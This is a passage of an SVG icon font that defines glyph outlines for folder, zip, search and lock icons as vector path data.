0-144-64.471-144-144s64.471-144 144-144v0z" />
<glyph unicode="&#xea0b;" glyph-name="folder-cancel2" d="M672.698 96h-608.913c-34.994 0-63.785 28.527-63.785 63.717v352.283h928v-111.941c-24.627 10.27-51.651 15.941-80 15.941-114.875 0-208-93.125-208-208 0-41.237 12-79.67 32.698-112v0 0zM0 544v192.283c0 35.247 28.693 63.717 64.088 63.717h351.912l64-128h383.813c35.482 0 64.187-28.583 64.187-63.843v-64.157h-928zM848 32c97.202 0 176 78.798 176 176s-78.798 176-176 176c-97.202 0-176-78.798-176-176s78.798-176 176-176zM848 185.373l-67.882-67.882-22.627 22.627 67.882 67.882-67.882 67.882 22.627 22.627 67.882-67.882 67.882 67.882 22.627-22.627-67.882-67.882 67.882-67.882-22.627-22.627-67.882 67.882z" />
<glyph unicode="&#xea0c;" glyph-name="folder-checked" d="M691.191 128v0c-12.27 24.002-19.191 51.193-19.191 80 0 97.202 78.798 176 176 176 16.64 0 32.741-2.309 48-6.625v134.625h-864v-352.262c0-17.528 14.275-31.738 31.775-31.738h627.416zM712.229 96h-648.444c-34.994 0-63.785 28.527-63.785 63.717v576.566c0 35.247 28.693 63.717 64.088 63.717h351.912l64-128h383.813c35.482 0 64.187-28.583 64.187-63.843v-243.348c56.987-29.131 96-88.414 96-156.809 0-97.202-78.798-176-176-176-54.654 0-103.489 24.912-135.771 64v0 0zM32 544h864v63.972c0 17.689-14.522 32.028-32.095 32.028h-404.385l-62.719 128h-333.065c-17.527 0-31.736-14.57-31.736-31.738v-192.262zM848 64c79.529 0 144 64.471 144 144s-64.471 144-144 144c-79.529 0-144-64.471-144-144s64.471-144 144-144v0zM832 120.235l-75.314 75.314 23.431 23.431 51.882-51.882 99.882 99.882 23.431-23.431-123.314-123.314z" />
<glyph unicode="&#xea0d;" glyph-name="folder-checked2" d="M672.698 96h-608.913c-34.994 0-63.785 28.527-63.785 63.717v352.283h928v-111.941c-24.627 10.27-51.651 15.941-80 15.941-114.875 0-208-93.125-208-208 0-41.237 12-79.67 32.698-112v0 0zM0 544v192.283c0 35.247 28.693 63.717 64.088 63.717h351.912l64-128h383.813c35.482 0 64.187-28.583 64.187-63.843v-64.157h-928zM848 32c97.202 0 176 78.798 176 176s-78.798 176-176 176c-97.202 0-176-78.798-176-176s78.798-176 176-176v0zM832 120.235l-75.314 75.314 23.431 23.431 51.882-51.882 99.882 99.882 23.431-23.431-123.314-123.314z" />
<glyph unicode="&#xea0e;" glyph-name="folder-add" d="M832 224v96h32v-96h96v-32h-96v-96h-32v96h-96v32h96zM691.191 128v0c-12.27 24.002-19.191 51.193-19.191 80 0 97.202 78.798 176 176 176 16.64 0 32.741-2.309 48-6.625v134.625h-864v-352.262c0-17.528 14.275-31.738 31.775-31.738h627.416zM712.229 96h-648.444c-34.994 0-63.785 28.527-63.785 63.717v576.566c0 35.247 28.693 63.717 64.088 63.717h351.912l64-128h383.813c35.482 0 64.187-28.583 64.187-63.843v-243.348c56.987-29.131 96-88.414 96-156.809 0-97.202-78.798-176-176-176-54.654 0-103.489 24.912-135.771 64v0 0zM32 544h864v63.972c0 17.689-14.522 32.028-32.095 32.028h-404.385l-62.719 128h-333.065c-17.527 0-31.736-14.57-31.736-31.738v-192.262zM848 64c79.529 0 144 64.471 144 144s-64.471 144-144 144c-79.529 0-144-64.471-144-144s64.471-144 144-144v0z" />
<glyph unicode="&#xea0f;" glyph-name="folder-add2" d="M832 192h-96v32h96v96h32v-96h96v-32h-96v-96h-32v96zM672.698 96h-608.913c-34.994 0-63.785 28.527-63.785 63.717v352.283h928v-111.941c-24.627 10.27-51.651 15.941-80 15.941-114.875 0-208-93.125-208-208 0-41.237 12-79.67 32.698-112v0 0zM0 544v192.283c0 35.247 28.693 63.717 64.088 63.717h351.912l64-128h383.813c35.482 0 64.187-28.583 64.187-63.843v-64.157h-928zM848 32c97.202 0 176 78.798 176 176s-78.798 176-176 176c-97.202 0-176-78.798-176-176s78.798-176 176-176v0z" />
<glyph unicode="&#xea10;" glyph-name="folder-remove" d="M691.191 128v0c-12.27 24.002-19.191 51.193-19.191 80 0 97.202 78.798 176 176 176 16.64 0 32.741-2.309 48-6.625v134.625h-864v-352.262c0-17.528 14.275-31.738 31.775-31.738h627.416zM712.229 96h-648.444c-34.994 0-63.785 28.527-63.785 63.717v576.566c0 35.247 28.693 63.717 64.088 63.717h351.912l64-128h383.813c35.482 0 64.187-28.583 64.187-63.843v-243.348c56.987-29.131 96-88.414 96-156.809 0-97.202-78.798-176-176-176-54.654 0-103.489 24.912-135.771 64v0 0zM32 544h864v63.972c0 17.689-14.522 32.028-32.095 32.028h-404.385l-62.719 128h-333.065c-17.527 0-31.736-14.57-31.736-31.738v-192.262zM848 64c79.529 0 144 64.471 144 144s-64.471 144-144 144c-79.529 0-144-64.471-144-144s64.471-144 144-144v0zM736 224v-32h224v32h-224z" />
<glyph unicode="&#xea11;" glyph-name="folder-remove2" d="M672.698 96h-608.913c-34.994 0-63.785 28.527-63.785 63.717v352.283h928v-111.941c-24.627 10.27-51.651 15.941-80 15.941-114.875 0-208-93.125-208-208 0-41.237 12-79.67 32.698-112v0 0zM0 544v192.283c0 35.247 28.693 63.717 64.088 63.717h351.912l64-128h383.813c35.482 0 64.187-28.583 64.187-63.843v-64.157h-928zM848 32v0c-97.202 0-176 78.798-176 176s78.798 176 176 176c97.202 0 176-78.798 176-176s-78.798-176-176-176zM736 224v-32h224v32h-224z" />
<glyph unicode="&#xea12;" glyph-name="folder-forbidden" d="M960.51 297.883l-202.393-202.393c24.635-19.706 55.883-31.49 89.883-31.49 79.529 0 144 64.471 144 144 0 34-11.784 65.248-31.49 89.883zM937.883 320.51c-24.635 19.706-55.883 31.49-89.883 31.49-79.529 0-144-64.471-144-144 0-34 11.784-65.248 31.49-89.883l202.393 202.393zM691.191 128v0c-12.27 24.002-19.191 51.193-19.191 80 0 97.202 78.798 176 176 176 16.64 0 32.741-2.309 48-6.625v134.625h-864v-352.262c0-17.528 14.275-31.738 31.775-31.738h627.416zM712.229 96h-648.444c-34.994 0-63.785 28.527-63.785 63.717v576.566c0 35.247 28.693 63.717 64.088 63.717h351.912l64-128h383.813c35.482 0 64.187-28.583 64.187-63.843v-243.348c56.987-29.131 96-88.414 96-156.809 0-97.202-78.798-176-176-176-54.654 0-103.489 24.912-135.771 64v0 0zM32 544h864v63.972c0 17.689-14.522 32.028-32.095 32.028h-404.385l-62.719 128h-333.065c-17.527 0-31.736-14.57-31.736-31.738v-192.262z" />
<glyph unicode="&#xea13;" glyph-name="folder-forbidden2" d="M984.588 319.004c24.641-30.283 39.412-68.918 39.412-111.004 0-97.202-78.798-176-176-176-42.085 0-80.72 14.771-111.004 39.412l247.591 247.591zM962.228 341.899c-30.742 26.251-70.634 42.101-114.228 42.101-97.202 0-176-78.798-176-176 0-43.594 15.85-83.486 42.101-114.228l248.128 248.128zM672.698 96h-608.913c-34.994 0-63.785 28.527-63.785 63.717v352.283h928v-111.941c-24.627 10.27-51.651 15.941-80 15.941-114.875 0-208-93.125-208-208 0-41.237 12-79.67 32.698-112v0 0zM0 544v192.283c0 35.247 28.693 63.717 64.088 63.717h351.912l64-128h383.813c35.482 0 64.187-28.583 64.187-63.843v-64.157h-928z" />
<glyph unicode="&#xea14;" glyph-name="folder-bookmark" d="M768 512h192v-351.972c0-17.8-14.226-32.028-31.775-32.028h-800.45c-17.499 0-31.775 14.209-31.775 31.738v352.262h480v-288l96 96 96-96v288zM96 544v192.262c0 17.168 14.208 31.738 31.736 31.738h333.065l62.719-128h404.385c17.573 0 32.095-14.339 32.095-32.028v-63.972h-864zM544 672l-64 128h-351.912c-35.395 0-64.088-28.47-64.088-63.717v-576.566c0-35.19 28.791-63.717 63.785-63.717h800.43c35.228 0 63.785 28.564 63.785 63.843v448.314c0 35.259-28.706 63.843-64.187 63.843h-383.813zM608 512h128v-211.199l-64 64-64-64v211.199z" />
<glyph unicode="&#xea15;" glyph-name="folder-bookmark2" d="M768 512h224v-352.157c0-35.279-28.558-63.843-63.785-63.843h-800.43c-34.994 0-63.785 28.527-63.785 63.717v352.283h512v-288l96 96 96-96v288zM64 544v192.283c0 35.247 28.693 63.717 64.088 63.717h351.912l64-128h383.813c35.482 0 64.187-28.583 64.187-63.843v-64.157h-928zM608 512v-211.199l64 64 64-64v211.199h-128z" />
<glyph unicode="&#xea16;" glyph-name="document-zip" d="M416 382.412v33.588h-32v32h32v32h-32v32h32v32h-32v32h32v32h-32v32h32v32h-32v32h32v32h-32v32h32v32h-32v32h-96.142c-17.595 0-31.858-14.568-31.858-31.855v-736.291c0-17.593 14.551-31.855 31.999-31.855h480.003c17.672 0 31.999 14.238 31.999 31.789v544.211h-128.067c-35.309 0-63.933 28.37-63.933 64.189v159.811h-160v-32h32v-32h-32v-32h32v-32h-32v-32h32v-32h-32v-32h32v-32h-32v-32h32v-32h-32v-32h32v-32h-32v-65.583c36.709-7.378 64-39.683 64-78.417 0-44.491-35.817-80-80-80-44.491 0-80 35.817-80 80 0 38.973 27.484 71.054 64 78.412v0 0zM832 640v-576.295c0-34.963-28.617-63.705-63.918-63.705h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.693 64.235 64.088 64.235h351.912l192-224zM640 816v-143.719c0-17.828 14.421-32.281 31.896-32.281h118.503l-150.398 176zM432 352c-26.51 0-48-21.306-48-48 0-26.51 21.306-48 48-48 26.51 0 48 21.306 48 48 0 26.51-21.306 48-48 48v0z" />
<glyph unicode="&#xea17;" glyph-name="document-zip2" d="M416 382.412v33.588h-32v32h32v32h-32v32h32v32h-32v32h32v32h-32v32h32v32h-32v32h32v32h-32v32h32v32h-32v32h32v32h-127.727c-35.497 0-64.273-28.747-64.273-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h480.165c35.301 0 63.918 28.51 63.918 63.918v544.082h-159.811c-35.451 0-64.189 28.375-64.189 63.939v192.061h-128v-32h-32v-32h32v-32h-32v-32h32v-32h-32v-32h32v-32h-32v-32h32v-32h-32v-32h32v-32h-32v-32h32v-32h-32v-65.583c36.709-7.378 64-39.683 64-78.417 0-44.491-35.817-80-80-80-44.491 0-80 35.817-80 80 0 38.973 27.484 71.054 64 78.412v0 0zM640 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM432 352c-26.51 0-48-21.306-48-48 0-26.51 21.306-48 48-48 26.51 0 48 21.306 48 48 0 26.51-21.306 48-48 48v0z" />
<glyph unicode="&#xea18;" glyph-name="zip" d="M512 399.206v-16.794c-36.516-7.358-64-39.439-64-78.412 0-44.183 35.509-80 80-80 44.183 0 80 35.509 80 80 0 38.734-27.291 71.039-64 78.417v65.583h32v32h-32v32h32v32h-32v32h32v32h-32v32h32v32h-32v32h32v32h-32v32h32v32h-32v32h159.996c53.317 0 96.004-42.848 96.004-95.704v-608.592c0-52.693-42.982-95.704-96.004-95.704h-351.992c-53.317 0-96.004 42.848-96.004 95.704v608.592c0 52.693 42.982 95.704 96.004 95.704h127.996v-32h32v-32h-32v-32h32v-32h-32v-32h32v-32h-32v-32h32v-32h-32v-32h32v-32h-32v-32h32v-32h-32v-32h32v-16.794zM352.198 864c-70.802 0-128.198-57.359-128.198-127.951v-608.098c0-70.665 57.199-127.951 128.198-127.951h351.604c70.802 0 128.198 57.359 128.198 127.951v608.098c0 70.665-57.199 127.951-128.198 127.951h-351.604zM528 352v0c26.694 0 48-21.49 48-48 0-26.694-21.49-48-48-48-26.694 0-48 21.49-48 48 0 26.694 21.49 48 48 48z" />
<glyph unicode="&#xea19;" glyph-name="zip2" d="M512 382.412v33.588h-32v32h32v32h-32v32h32v32h-32v32h32v32h-32v32h32v32h-32v32h32v32h-32v32h32v32h-32v32h32v32h-159.802c-70.802 0-128.198-57.359-128.198-127.951v-608.098c0-70.665 57.199-127.951 128.198-127.951h351.604c70.802 0 128.198 57.359 128.198 127.951v608.098c0 70.665-57.199 127.951-128.198 127.951h-127.802v-32h-32v-32h32v-32h-32v-32h32v-32h-32v-32h32v-32h-32v-32h32v-32h-32v-32h32v-32h-32v-32h32v-32h-32v-65.583c36.709-7.378 64-39.683 64-78.417 0-44.491-35.817-80-80-80-44.491 0-80 35.817-80 80 0 38.973 27.484 71.054 64 78.412v0 0zM528 352c-26.51 0-48-21.306-48-48 0-26.51 21.306-48 48-48 26.51 0 48 21.306 48 48 0 26.51-21.306 48-48 48v0z" />
<glyph unicode="&#xea1a;" glyph-name="search4" d="M621.668 306.332c-44.476-31.692-98.895-50.332-157.668-50.332-150.221 0-272 121.779-272 272s121.779 272 272 272c150.221 0 272-121.779 272-272 0-75.111-30.445-143.111-79.667-192.333l191.916-191.916c8.802-8.802 8.588-22.915-0.249-31.751-8.898-8.898-23.052-8.948-31.751-0.249l-194.581 194.581zM464 288c132.548 0 240 107.452 240 240s-107.452 240-240 240c-132.548 0-240-107.452-240-240s107.452-240 240-240v0z" />
<glyph unicode="&#xea1b;" glyph-name="search5" d="M621.668 306.332c-44.476-31.692-98.895-50.332-157.668-50.332-150.221 0-272 121.779-272 272s121.779 272 272 272c150.221 0 272-121.779 272-272 0-58.773-18.641-113.192-50.332-157.668l178.714-178.714c17.606-17.606 17.46-45.778-0.006-63.244l-0.75-0.75c-17.421-17.421-45.781-17.469-63.244-0.006l-178.714 178.714zM464 320c114.875 0 208 93.125 208 208s-93.125 208-208 208c-114.875 0-208-93.125-208-208s93.125-208 208-208v0z" />
<glyph unicode="&#xea1c;" glyph-name="search-plus" d="M448 544v128h32v-128h128v-32h-128v-128h-32v128h-128v32h128zM644.651 324.651c-48.040-42.708-111.316-68.651-180.651-68.651-150.221 0-272 121.779-272 272s121.779 272 272 272c150.221 0 272-121.779 272-272 0-69.335-25.943-132.612-68.651-180.651l4.651 4.651 208.249-208.249c8.802-8.802 8.588-22.915-0.249-31.751-8.898-8.898-23.052-8.948-31.751-0.249l-208.249 208.249 4.651 4.651zM464 288c132.548 0 240 107.452 240 240s-107.452 240-240 240c-132.548 0-240-107.452-240-240s107.452-240 240-240v0z" />
<glyph unicode="&#xea1d;" glyph-name="search-plus2" d="M448 544v128h32v-128h128v-32h-128v-128h-32v128h-128v32h128zM621.668 306.332c-44.476-31.692-98.895-50.332-157.668-50.332-150.221 0-272 121.779-272 272s121.779 272 272 272c150.221 0 272-121.779 272-272 0-58.773-18.641-113.192-50.332-157.668l178.714-178.714c17.606-17.606 17.46-45.778-0.006-63.244l-0.75-0.75c-17.421-17.421-45.781-17.469-63.244-0.006l-178.714 178.714zM464 320c114.875 0 208 93.125 208 208s-93.125 208-208 208c-114.875 0-208-93.125-208-208s93.125-208 208-208v0z" />
<glyph unicode="&#xea1e;" glyph-name="search-minus" d="M644.651 324.651c-48.040-42.708-111.316-68.651-180.651-68.651-150.221 0-272 121.779-272 272s121.779 272 272 272c150.221 0 272-121.779 272-272 0-69.335-25.943-132.612-68.651-180.651l4.651 4.651 208.249-208.249c8.802-8.802 8.588-22.915-0.249-31.751-8.898-8.898-23.052-8.948-31.751-0.249l-208.249 208.249 4.651 4.651zM464 288c132.548 0 240 107.452 240 240s-107.452 240-240 240c-132.548 0-240-107.452-240-240s107.452-240 240-240v0zM320 544v-32h288v32h-288z" />
<glyph unicode="&#xea1f;" glyph-name="search-minus2" d="M621.668 306.332c-44.476-31.692-98.895-50.332-157.668-50.332-150.221 0-272 121.779-272 272s121.779 272 272 272c150.221 0 272-121.779 272-272 0-58.773-18.641-113.192-50.332-157.668l178.714-178.714c17.606-17.606 17.46-45.778-0.006-63.244l-0.75-0.75c-17.421-17.421-45.781-17.469-63.244-0.006l-178.714 178.714zM464 320c114.875 0 208 93.125 208 208s-93.125 208-208 208c-114.875 0-208-93.125-208-208s93.125-208 208-208v0zM320 544v-32h288v32h-288z" />
<glyph unicode="&#xea20;" glyph-name="lock4" d="M480 258.731v0 0c-18.643 6.589-32 24.369-32 45.269 0 26.51 21.49 48 48 48s48-21.49 48-48c0-20.9-13.357-38.679-32-45.269v-83.019c0-8.42-7.163-15.712-16-15.712-8.578 0-16 7.035-16 15.712v83.019zM448 239.994v-63.941c0-26.539 21.306-48.054 48-48.054 26.51 0 48 21.478 48 48.054v63.941c19.431 14.595 32 37.833 32 64.006 0 44.183-35.817 80-80 80s-80-35.817-80-80c0-26.173 12.569-49.411 32-64.006v0 0zM256 512v112.025c0 132.561 107.452 239.976 240 239.976 132.279 0 240-107.441 240-239.976v-112.025c53.093-0.152 96-43.21 96-96.303v-319.393c0-53.531-43.107-96.303-96.281-96.303h-479.438c-53.222 0-96.281 43.116-96.281 96.303v319.393c0 53.437 42.955 96.152 96 96.303v0 0zM288 512h32v111.71c0 97.525 78.798 176.29 176 176.29 97.004 0 176-78.928 176-176.29v-111.71h32v112.21c0 114.759-93.359 207.79-208 207.79-114.875 0-208-93.061-208-207.79v-112.21zM352 512h288v111.973c0 79.544-64.633 144.027-144 144.027-79.529 0-144-64.296-144-144.027v-111.973zM255.918 480c-35.301 0-63.918-28.706-63.918-64.187v-319.625c0-35.45 28.51-64.187 63.918-64.187h480.165c35.301 0 63.918 28.706 63.918 64.187v319.625c0 35.45-28.51 64.187-63.918 64.187h-480.165z" />
<glyph unicode="&#xea21;" glyph-name="lock5" d="M480 258.731v0c-18.643 6.589-32 24.369-32 45.269 0 26.51 21.49 48 48 48s48-21.49 48-48c0-20.9-13.357-38.679-32-45.269v-83.019c0-8.42-7.163-15.712-16-15.712-8.578 0-16 7.035-16 15.712v83.019zM256 512v0 0c-53.045-0.15-96-42.866-96-96.303v-319.393c0-53.187 43.059-96.303 96.281-96.303h479.438c53.175 0 96.281 42.772 96.281 96.303v319.393c0 53.093-42.907 96.151-96 96.303v112.025c0 132.535-107.721 239.976-240 239.976-132.548 0-240-107.415-240-239.976v-112.025zM352 512v111.973c0 79.731 64.471 144.027 144 144.027 79.367 0 144-64.483 144-144.027v-111.973h-288z" />
<glyph unicode="&#xea22;" glyph-name="lock-open" d="M640 194.731v0 0c-18.643 6.589-32 24.369-32 45.269 0 26.51 21.49 48 48 48s48-21.49 48-48c0-20.9-13.357-38.679-32-45.269v-83.019c0-8.42-7.163-15.712-16-15.712-8.578 0-16 7.035-16 15.712v83.019zM608 175.994v-63.941c0-26.539 21.306-48.054 48-48.054 26.51 0 48 21.478 48 48.054v63.941c19.431 14.595 32 37.833 32 64.006 0 44.183-35.817 80-80 80s-80-35.817-80-80c0-26.173 12.569-49.411 32-64.006v0 0zM512 448h383.719c53.222 0 96.281-43.116 96.281-96.303v-319.393c0-53.531-43.107-96.303-96.281-96.303h-479.438c-53.222 0-96.281 43.116-96.281 96.303v319.393c0 53.437 42.955 96.152 96 96.303v240.003c0 79.528-64.633 143.997-144 143.997-79.529 0-144-64.54-144-143.997v-127.997c0-26.427-21.49-48.005-48-48.005-26.694 0-48 21.493-48 48.005v128.019c0 132.561 107.452 239.976 240 239.976 132.279 0 240-107.441 240-239.976v-240.024zM480 687.977c0 114.888-93.359 208.023-208 208.023-114.875 0-208-93.439-208-208.023v-128.019c0-8.813 7.422-15.958 16-15.958v0c8.837 0 16 6.952 16 15.976v128.165c0 96.997 78.798 175.859 176 175.859 97.004 0 176-78.735 176-175.859v-240.141h32v239.977zM415.918 416c-35.301 0-63.918-28.706-63.918-64.187v-319.625c0-35.45 28.51-64.187 63.918-64.187h480.165c35.301 0 63.918 28.706 63.918 64.187v319.625c0 35.45-28.51 64.187-63.918 64.187h-480.165z" />
<glyph unicode="&#xea23;" glyph-name="lock-open2" d="M640 194.731v-83.019c0-8.678 7.422-15.712 16-15.712 8.837 0 16 7.292 16 15.712v83.019c18.643 6.589 32 24.369 32 45.269 0 26.51-21.49 48-48 48s-48-21.49-48-48c0-20.9 13.357-38.679 32-45.269v0 0zM416 688.003c0 79.528-64.633 143.997-144 143.997-79.529 0-144-64.54-144-143.997v-127.976c0-26.313-21.49-48.027-48-48.027-26.694 0-48 21.502-48 48.027v127.998c0 132.561 107.452 239.976 240 239.976 132.279 0 240-107.441 240-239.976v-240.024h383.719c53.222 0 96.281-43.116 96.281-96.303v-319.393c0-53.531-43.107-96.303-96.281-96.303h-479.438c-53.222 0-96.281 43.116-96.281 96.303v319.393c0 53.437 42.955 96.152 96 96.303v240.003z" />
<glyph unicode="&#xea24;" glyph-name="lock-open3" d="M768 656v-95.995c0-26.427-21.49-48.005-48-48.005-26.694 0-48 21.493-48 48.005v128.012c0 79.52-64.633 143.983-144 143.983-79.529 0-144-64.327-144-143.983v-224.034c0-5.402 0.298-10.735 0.879-15.983h383.121c53.093-0.152 96-43.21 96-96.303v-319.393c0-53.531-43.107-96.303-96.281-96.303h-479.438c-53.222 0-96.281 43.116-96.281 96.303v319.393c0 53.437 42.955 96.152 96 96.303v240.025c0 132.561 107.452 239.976 240 239.976 132.279 0 240-107.441 240-239.976v-32.024zM736 688.21c0 114.759-93.359 207.79-208 207.79-114.875 0-208-93.061-208-207.79v-224.421c0-5.312 0.2-10.578 0.593-15.79h31.407v239.71c0 97.525 78.798 176.29 176 176.29 97.004 0 176-78.928 176-176.29v-127.781c0-8.797 7.422-15.929 16-15.929v0c8.837 0 16 6.882 16 15.695v128.515zM512 194.731v0 0c-18.643 6.589-32 24.369-32 45.269 0 26.51 21.49 48 48 48s48-21.49 48-48c0-20.9-13.357-38.679-32-45.269v-83.019c0-8.42-7.163-15.712-16-15.712-8.578 0-16 7.035-16 15.712v83.019zM480 175.994v-63.941c0-26.539 21.306-48.054 48-48.054 26.51 0 48 21.478 48 48.054v63.941c19.431 14.595 32 37.833 32 64.006 0 44.183-35.817 80-80 80s-80-35.817-80-80c0-26.173 12.569-49.411 32-64.006v0 0zM287.918 416c-35.301 0-63.918-28.706-63.918-64.187v-319.625c0-35.45 28.51-64.187 63.918-64.187h480.165c35.301 0 63.918 28.706 63.918 64.187v319.625c0 35.45-28.51 64.187-63.918 64.187h-480.165z" />
<glyph unicode="&#xea25;" glyph-name="lock-open4" d="M512 194.731v0 0c-18.643 6.589-32 24.369-32 45.269 0 26.51 21.49 48 48 48s48-21.49 48-48c0-20.9-13.357-38.679-32-45.269v-83.019c0-8.42-7.163-15.712-16-15.712-8.578 0-16 7.035-16 15.712v83.019zM768 656v32.024c0 132.535-107.721 239.976-240 239.976-132.548 0-240-107.415-240-239.976v-240.025c-53.045-0.15-96-42.866-96-96.303v-319.393c0-53.187 43.059-96.303 96.281-96.303h479.438c53.175 0 96.281 42.772 96.281 96.303v319.393c0 53.093-42.907 96.151-96 96.303h-383.121c-0.581 5.248-0.879 10.581-0.879 15.983v224.034c0 79.656 64.471 143.983 144 143.983 79.367 0 144-64.463 144-143.983v-115.984c0-33.155 21.306-60.033 48-60.033 26.51 0 48 27.142 48 60.033v83.967z" />
<glyph unicode="&#xea26;" glyph-name="lock-stripes" d="M224 224h608v191.813c0 35.45-28.51 64.187-63.918 64.187h-480.165c-35.301 0-63.918-28.706-63.918-64.187v-191.813zM224 192v-64h24l48 64h-72zM224 96c0.1-35.364 28.572-64 63.917-64h480.165c35.238 0 63.817 28.605 63.917 64h-607.999zM832 128v64h-24l-48-64h72zM288 512v112.025c0 132.561 107.452 239.976 240 239.976 132.279 0 240-107.441 240-239.976v-112.025c53.093-0.152 96-43.21 96-96.303v-319.393c0-53.531-43.107-96.303-96.281-96.303h-479.438c-53.222 0-96.281 43.116-96.281 96.303v319.393c0 53.437 42.955 96.152 96 96.303v0 0zM280 128h64l48 64h-64l-48-64zM376 128h64l48 64h-64l-48-64zM472 128h64l48 64h-64l-48-64zM568 128h64l48 64h-64l-48-64zM664 128h64l48 64h-64l-48-64zM320 512h32v111.71c0 97.525 78.798 176.29 176 176.29 97.004 0 176-78.928 176-176.29v-111.71h32v112.21c0 114.759-93.359 207.79-208 207.79-114.875 0-208-93.061-208-207.79v-112.21zM384 512h288v111.973c0 79.544-64.633 144.027-144 144.027-79.529 0-144-64.296-144-144.027v-111.973z" />
<glyph unicode="&#xea27;" glyph-name="lock-stripes2" d="M864 128v64h-56l-48-64h104zM864 96c-0.162-53.389-43.207-96-96.281-96h-479.438c-53.121 0-96.117 42.953-96.281 96h671.999zM192 128v64h104l-48-64h-56zM280 128l48 64h64l-48-64h-64zM376 128l48 64h64l-48-64h-64zM472 128l48 64h64l-48-64h-64zM568 128l48 64h64l-48-64h-64zM664 128l48 64h64l-48-64h-64zM864 224v191.697c0 53.093-42.907 96.151-96 96.303v112.025c0 132.535-107.721 239.976-240 239.976-132.548 0-240-107.415-240-239.976v-112.025c-53.045-0.15-96-42.866-96-96.303v-191.697h672zM384 512v111.973c0 79.731 64.471 144.027 144 144.027 79.367 0 144-64.483 144-144.027v-111.973h-288z" />
<glyph unicode="&#xea28;" glyph-name="lock-rounded" d="M512 258.731v0c-18.643 6.589-32 24.369-32 45.269 0 26.51 21.49 48 48 48s48-21.49 48-48c0-20.9-13.357-38.679-32-45.269v-83.019c0-8.42-7.163-15.712-16-15.712-8.578 0-16 7.035-16 15.712v83.019zM480 239.994v-63.941c0-26.539 21.306-48.054 48-48.054 26.51 0 48 21.478 48 48.054v63.941c19.431 14.595 32 37.833 32 64.006 0 44.183-35.817 80-80 80s-80-35.817-80-80c0-26.173 12.569-49.411 32-64.006v0 0zM288 512v112.025c0 132.561 107.452 239.976 240 239.976 132.279 0 240-107.441 240-239.976v-112.025c53.093-0.152 96-43.21 96-96.303v-159.697c0-141.097-114.602-256-255.971-256h-160.057c-141.214 0-255.971 114.615-255.971 256v159.697c0 53.437 42.955 96.152 96 96.303v0 0zM320 512h32v111.71c0 97.525 78.798 176.29 176 176.29 97.004 0 176-78.928 176-176.29v-111.71h32v112.21c0 114.759-93.359 207.79-208 207.79-114.875 0-208-93.061-208-207.79v-112.21zM384 512h288v111.973c0 79.544-64.633 144.027-144 144.027-79.529 0-144-64.296-144-144.027v-111.973zM287.918 480c-35.301 0-63.918-28.706-63.918-64.187v-159.813c0-123.712 100.399-224 223.807-224h160.387c123.605 0 223.807 100.54 223.807 224v159.813c0 35.45-28.51 64.187-63.918 64.187h-480.165z" />
<glyph unicode="&#xea29;" glyph-name="lock-rounded2" d="M512 258.731v0c-18.643 6.589-32 24.369-32 45.269 0 26.51 21.49 48 48 48s48-21.49 48-48c0-20.9-13.357-38.679-32-45.269v-83.019c0-8.42-7.163-15.712-16-15.712-8.578 0-16 7.035-16 15.712v83.019zM288 512v0 0c-53.045-0.15-96-42.866-96-96.303v-159.697c0-141.385 114.757-256 255.971-256h160.057c141.369 0 255.971 114.903 255.971 256v159.697c0 53.093-42.907 96.151-96 96.303v112.025c0 132.535-107.721 239.976-240 239.976-132.548 0-240-107.415-240-239.976v-112.025zM384 512v111.973c0 79.731 64.471 144.027 144 144.027 79.367 0 144-64.483 144-144.027v-111.973h-288z" />
<glyph unicode="&#xea2a;" glyph-name="lock-rounded-open" d="M672 194.731v0 0c-18.643 6.589-32 24.369-32 45.269 0 26.51 21.49 48 48 48s48-21.49 48-48c0-20.9-13.357-38.679-32-45.269v-83.019c0-8.42-7.163-15.712-16-15.712-8.578 0-16 7.035-16 15.712v83.019zM640 175.994v-63.941c0-26.539 21.306-48.054 48-48.054 26.51 0 48 21.478 48 48.054v63.941c19.431 14.595 32 37.833 32 64.006 0 44.183-35.817 80-80 80s-80-35.817-80-80c0-26.173 12.569-49.411 32-64.006v0 0zM544 448h383.719c53.222 0 96.281-43.116 96.281-96.303v-159.697c0-141.097-114.602-256-255.971-256h-160.057c-141.214 0-255.971 114.615-255.971 256v159.697c0 53.437 42.955 96.152 96 96.303v240.003c0 79.528-64.633 143.997-144 143.997-79.529 0-144-64.54-144-143.997v-127.997c0-26.427-21.49-48.005-48-48.005-26.694 0-48 21.493-48 48.005v128.019c0 132.561 107.452 239.976 240 239.976 132.279 0 240-107.441 240-239.976v-240.024zM512 687.977c0 114.888-93.359 208.023-208 208.023-114.875 0-208-93.439-208-208.023v-128.019c0-8.813 7.422-15.958 16-15.958v0c8.837 0 16 6.952 16 15.976v128.165c0 96.997 78.798 175.859 176 175.859 97.004 0 176-78.735 176-175.859v-240.141h32v239.977zM447.918 416c-35.301 0-63.918-28.706-63.918-64.187v-159.813c0-123.712 100.399-224 223.807-224h160.387c123.605 0 223.807 100.54 223.807 224v159.813c0 35.45-28.51 64.187-63.918 64.187h-480.165z" />
<glyph unicode="&#xea2b;" glyph-name="lock-rounded-open2" d="M672 194.731v-83.019c0-8.678 7.422-15.712 16-15.712 8.837 0 16 7.292 16 15.712v83.019c18.643 6.589 32 24.369 32 45.269 0 26.51-21.49 48-48 48s-48-21.49-48-48c0-20.9 13.357-38.679 32-45.269v0 0zM448 688.003c0 79.528-64.633 143.997-144 143.997-79.529 0-144-64.54-144-143.997v-127.976c0-26.313-21.49-48.027-48-48.027-26.694 0-48 21.502-48 48.027v127.998c0 132.561 107.452 239.976 240 239.976 132.279 0 240-107.441 240-239.976v-240.024h383.719c53.222 0 96.281-43.116 96.281-96.303v-159.697c0-141.097-114.602-256-255.971-256h-160.057c-141.214 0-255.971 114.615-255.971 256v159.697c0 53.437 42.955 96.152 96 96.303v240.003z" />
